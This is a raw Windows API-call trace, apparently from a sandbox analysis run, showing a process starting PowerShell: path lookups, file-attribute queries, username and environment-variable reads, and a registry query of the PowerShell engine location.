	[0305.994] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28ce90 | out: lpFileInformation=0x28ce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0305.994] SetErrorMode (uMode=0x1) returned 0x1
	[0305.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0305.995] SetErrorMode (uMode=0x1) returned 0x1
	[0305.995] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28ce90 | out: lpFileInformation=0x28ce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0305.995] SetErrorMode (uMode=0x1) returned 0x1
	[0305.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0305.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x28cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0305.995] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0305.995] SetErrorMode (uMode=0x1) returned 0x1
	[0305.995] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28ced0 | out: lpFileInformation=0x28ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0305.996] SetErrorMode (uMode=0x1) returned 0x1
	[0305.996] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0305.996] SetErrorMode (uMode=0x1) returned 0x1
	[0305.996] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28ced0 | out: lpFileInformation=0x28ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0305.996] SetErrorMode (uMode=0x1) returned 0x1
	[0305.996] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0305.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x28cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0305.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0305.996] SetErrorMode (uMode=0x1) returned 0x1
	[0305.996] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28ced0 | out: lpFileInformation=0x28ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0305.997] SetErrorMode (uMode=0x1) returned 0x1
	[0305.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0305.997] SetErrorMode (uMode=0x1) returned 0x1
	[0305.997] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28ced0 | out: lpFileInformation=0x28ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0306.902] SetErrorMode (uMode=0x1) returned 0x1
	[0306.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0306.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x28cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0306.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0306.904] SetErrorMode (uMode=0x1) returned 0x1
	[0306.904] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d190 | out: lpFileInformation=0x28d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0306.905] SetErrorMode (uMode=0x1) returned 0x1
	[0306.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.748] CoTaskMemAlloc (cb=0x804) returned 0x1b72c470
	[0307.748] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b72c470, nSize=0x28d4f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d4f8) returned 0x1
	[0307.748] CoTaskMemFree (pv=0x1b72c470) 
	[0307.748] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0307.748] GetUserNameW (in: lpBuffer=0x4b2780, pcbBuffer=0x28d538 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d538) returned 1
	[0307.749] CoTaskMemFree (pv=0x4b2780) 
	[0307.749] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x305dd60*="Available", lpRawData=0x305daf0) returned 1
	[0307.792] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0307.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.792] CoTaskMemFree (pv=0x471920) 
	[0307.792] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0307.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.792] CoTaskMemFree (pv=0x471920) 
	[0307.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.794] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0307.794] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0307.795] CoTaskMemFree (pv=0x471920) 
	[0307.795] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0307.795] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0307.795] CoTaskMemFree (pv=0x471920) 
	[0307.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.796] GetCurrentProcessId () returned 0xc8
	[0307.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.799] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d518 | out: phkResult=0x28d518*=0x390) returned 0x0
	[0307.799] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d49c, lpData=0x0, lpcbData=0x28d498*=0x0 | out: lpType=0x28d49c*=0x1, lpData=0x0, lpcbData=0x28d498*=0x56) returned 0x0
	[0307.799] CoTaskMemAlloc (cb=0x5a) returned 0x4c1670
	[0307.799] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d46c, lpData=0x4c1670, lpcbData=0x28d468*=0x56 | out: lpType=0x28d46c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d468*=0x56) returned 0x0
	[0307.799] CoTaskMemFree (pv=0x4c1670) 
	[0307.799] RegCloseKey (hKey=0x390) returned 0x0
	[0307.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.801] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0307.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.801] CoTaskMemFree (pv=0x471920) 
	[0307.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
